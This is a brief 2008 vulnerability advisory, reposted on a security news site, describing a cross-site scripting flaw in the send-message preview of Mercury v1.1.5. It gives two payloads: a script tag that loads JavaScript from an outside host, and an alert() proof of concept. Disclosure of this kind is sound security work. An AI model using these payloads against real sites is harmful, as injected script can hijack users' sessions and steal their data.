Computer Security

Security Advisory: Mercury v1.1.5 Send Message Cross-Site Scripting
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  joomla (k12.
tr)(com_iomez
un)SQL Injection

  joomll(k12.
tr)(com_mezun
)SQL Injection

  joomla (k12.
tr)(com_iomez
un)SQL Injection

  Kommentare zum Download script SQL Injection

From:no-reply_(at)_aria-security.net <no-reply_(at)_aria-security.net>
Date:12.02.2008
Subject:Mercury v1.1.5 Send Message Cross-Site Scripting

Aria-Security Team (Persian Security Network)
http://Aria-Security.Net
---------------------------------------------
Greetz: Aura, imm02tal, iM4n, Mormoroth,
Mercury v1.1.5 Send Message Cross-Site Scripting

In order to make this vuln work you need to place your code in the "message text" area and press
preview   


Examples:
<script src=http://Aria-Security.net/test.js></script>
<script>alert('Aria-Security Team')</script>

Regards,
The-0utl4w
Aria-Security.Net
(Credits Goes To Aria-Security Team)

----------------------------
More Info @ http://forum.aria-security.net/forumdisplay.php?f=60
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru